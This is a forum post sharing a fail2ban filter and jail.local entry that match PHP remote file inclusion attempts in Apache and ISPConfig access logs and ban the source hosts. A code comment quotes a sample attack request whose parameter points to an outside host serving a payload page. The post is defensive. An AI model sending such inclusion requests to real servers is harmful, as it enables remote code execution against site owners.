Hi there
Just a note on your jail.local
A filter I value a lot is [php-url-fopen]
Code:
[Definition]
# Option: failregex
# Notes.: regex to match this kind of request:
#
# 127.127.127.172 - - [26/Mar/2009:08:44:20 -0500] "GET /index.php?n=http://eatmyfood.hostinginfive.com/pizza.htm? HTTP/1.1" 200 114 "-" "Mozilla/
#
failregex = ^<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$
Now, to run this against
Code:
logpath = /var/log/apache*/*error.log
would make no sence, as a call to /index.php? may be valid, of course!
So I just create one in
Code:
/etc/fail2ban/filter.d/
with the name "php-url-fopenAccessLog.conf" and match it to the way ISPConfig2 keeps the logs.
Code:
[Definition]
# Option: failregex
failregex = \|\|\|\|.*.\|\|\|\|<HOST> -.*"(GET|POST).*\?.*\=http\:\/\/.* HTTP\/.*$
Now I add this to jail.local
Code:
[php-url-fopenAccessLog]
enabled = true
port = http,https
filter = php-url-fopenAccessLog
logpath = /var/log/httpd/ispconfig_access_log
maxretry = 2
Cheers